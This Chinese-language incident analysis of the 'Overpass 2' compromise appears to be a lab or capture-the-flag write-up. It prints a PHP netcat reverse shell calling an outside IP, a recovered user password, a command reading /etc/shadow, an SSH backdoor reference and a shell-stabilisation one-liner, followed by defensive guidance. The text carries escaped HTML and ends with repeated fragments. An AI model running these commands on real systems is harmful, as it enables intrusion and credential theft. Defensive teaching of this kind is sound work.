Overpass 2 被黑事件分析与教学文档<\/h1>

事件概述<\/h2>
Overpass 生产服务器被攻击者入侵，SOC团队通过分析捕获的PCAP文件发现了攻击路径。攻击者通过上传PHP反向shell获取初始访问权限，然后进行权限提升和持久化操作。<\/p>

攻击分析<\/h2>

初始访问<\/h3>

攻击入口点<\/strong>：<\/p>

URL: \/development\/upload.php<\/code><\/li>
攻击者上传了一个恶意PHP文件(payload.php<\/code>)<\/li> <\/ul> <\/li>
反向shell代码<\/strong>：<\/p> <\/li> <\/ol> <?<\/span>php<\/span> exec<\/span>("rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2>&1|nc 192.168.170.145 4242 >\/tmp\/f"<\/span>)?><\/span> <\/span><\/span><\/span><\/code><\/pre> 技术细节<\/strong>：使用exec()<\/code>函数执行系统命令<\/li> 创建命名管道(mkfifo<\/code>)<\/li> 通过netcat(nc<\/code>)建立反向连接到攻击者IP 192.168.170.145<\/code>端口4242<\/code><\/li> <\/ul> <\/li> <\/ol> 权限提升<\/h3> 发现凭据<\/strong>：<\/p> 在\/var\/www\/html\/development\/uploads\/.overpass<\/code>文件中发现凭据<\/li> 内容: ,LQ?2>6QiQ$JDE6>Q[QA2DDQiQH96?6G6C?@E62CE:?DE2?EQN.<\/code><\/li> <\/ul> <\/li> 切换到james用户<\/strong>：<\/p> 密码: whenevernoteartinstant<\/code><\/li> 命令: su james<\/code><\/li> <\/ul> <\/li> sudo权限检查<\/strong>：<\/p> <\/li> <\/ol> sudo -l <\/span><\/span><\/code><\/pre>输出显示james用户拥有所有sudo权限：<\/p> User james may run the following commands on overpass-production: (ALL : ALL) ALL <\/code><\/pre> 查看敏感文件<\/strong>：<\/li> <\/ol> sudo cat \/etc\/shadow <\/span><\/span><\/code><\/pre>持久化技术<\/h3> SSH后门<\/strong>：<\/p> 在端口2222上设置SSH后门<\/li> 使用项目: NinjaJc01\/ssh-backdoor<\/a><\/li> <\/ul> <\/li> shell稳定化<\/strong>：<\/p> <\/li> <\/ol> python3 -c 'import pty;pty.spawn("\/bin\/bash")'<\/span> <\/span><\/span><\/code><\/pre>防御措施教学<\/h2> 1. 文件上传漏洞防护<\/h3> 输入验证<\/strong>：<\/p> 限制上传文件类型（白名单方式）<\/li> 验证文件内容而不仅是扩展名<\/li> <\/ul> <\/li> 服务器配置<\/strong>：<\/p> 将上传目录设置为不可执行<\/li> 使用open_basedir<\/code>限制PHP访问范围<\/li> <\/ul> <\/li> 示例安全代码<\/strong>：<\/p> <\/li> <\/ul> $allowed =<\/span> ['image\/jpeg'<\/span>, 'image\/png'<\/span>]; <\/span><\/span>if<\/span>(!<\/span>in_array<\/span>($_FILES['file'<\/span>]['type'<\/span>], $allowed)) { <\/span><\/span> die<\/span>("Invalid file type"<\/span>); <\/span><\/span>} <\/span><\/span><\/code><\/pre>2. 权限最小化原则<\/h3> sudo配置<\/strong>：<\/p> 避免使用(ALL : ALL) ALL<\/code><\/li> 为特定用户指定精确的命令集<\/li> <\/ul> <\/li> 示例安全sudoers<\/strong>：<\/p> <\/li> <\/ul> User james may run the following commands on overpass-production: \/usr\/bin\/systemctl restart apache2, \/usr\/bin\/vi \/etc\/apache2\/sites-available\/* <\/code><\/pre> 3. 凭据安全管理<\/h3> 敏感信息存储<\/strong>：<\/p> 避免在web目录存储凭据<\/li> 使用加密存储或密钥管理系统<\/li> <\/ul> <\/li> 密码策略<\/strong>：<\/p> 强制使用复杂密码<\/li> 定期轮换密码<\/li> <\/ul> <\/li> <\/ul> 4. 网络监控与防护<\/h3> 入侵检测<\/strong>：<\/p> 监控异常网络连接（如反向shell）<\/li> 设置对nc<\/code>、bash -i<\/code>等命令的告警<\/li> <\/ul> <\/li> 网络分段<\/strong>：<\/p> 生产服务器不应允许任意出站连接<\/li> 限制内部网络横向移动<\/li> <\/ul> <\/li> <\/ul> 5. 后门检测与防护<\/h3> 异常端口监控<\/strong>：<\/p> 监控非标准端口上的服务（如2222）<\/li> <\/ul> <\/li> 文件完整性监控<\/strong>：<\/p> 使用工具如AIDE监控关键文件变更<\/li> 定期检查crontab和启动项<\/li> <\/ul> <\/li> <\/ul> 事件响应流程<\/h2> 隔离系统<\/strong>：<\/p> 立即将受影响服务器从网络隔离<\/li> <\/ul> <\/li> 取证分析<\/strong>：<\/p> 保存内存和磁盘镜像<\/li> 分析日志和网络流量<\/li> <\/ul> <\/li> 密码重置<\/strong>：<\/p> 重置所有用户密码<\/li> 撤销所有SSH密钥<\/li> <\/ul> <\/li> 漏洞修复<\/strong>：<\/p> 修复文件上传漏洞<\/li> 调整sudo权限<\/li> <\/ul> <\/li> 恢复验证<\/strong>：<\/p> 从干净备份恢复系统<\/li> 验证所有安全措施已实施<\/li> <\/ul> <\/li> <\/ol> 总结<\/h2> 通过分析Overpass 2被黑事件，我们可以学习到攻击者如何利用文件上传漏洞获取初始访问权限，然后通过发现存储的凭据进行权限提升，最终建立持久化访问。防御此类攻击需要多层防护：安全的代码实践、严格的权限控制、有效的监控系统和健全的事件响应流程。<\/p>

Overpass 2 被黑事件分析与教学文档<\/h1>

事件概述<\/h2> Overpass 生产服务器被攻击者入侵，SOC团队通过分析捕获的PCAP文件发现了攻击路径。攻击者通过上传PHP反向shell获取初始访问权限，然后进行权限提升和持久化操作。<\/p>

攻击分析<\/h2>

防御措施教学<\/h2>

事件概述<\/h2>
Overpass 生产服务器被攻击者入侵，SOC团队通过分析捕获的PCAP文件发现了攻击路径。攻击者通过上传PHP反向shell获取初始访问权限，然后进行权限提升和持久化操作。<\/p>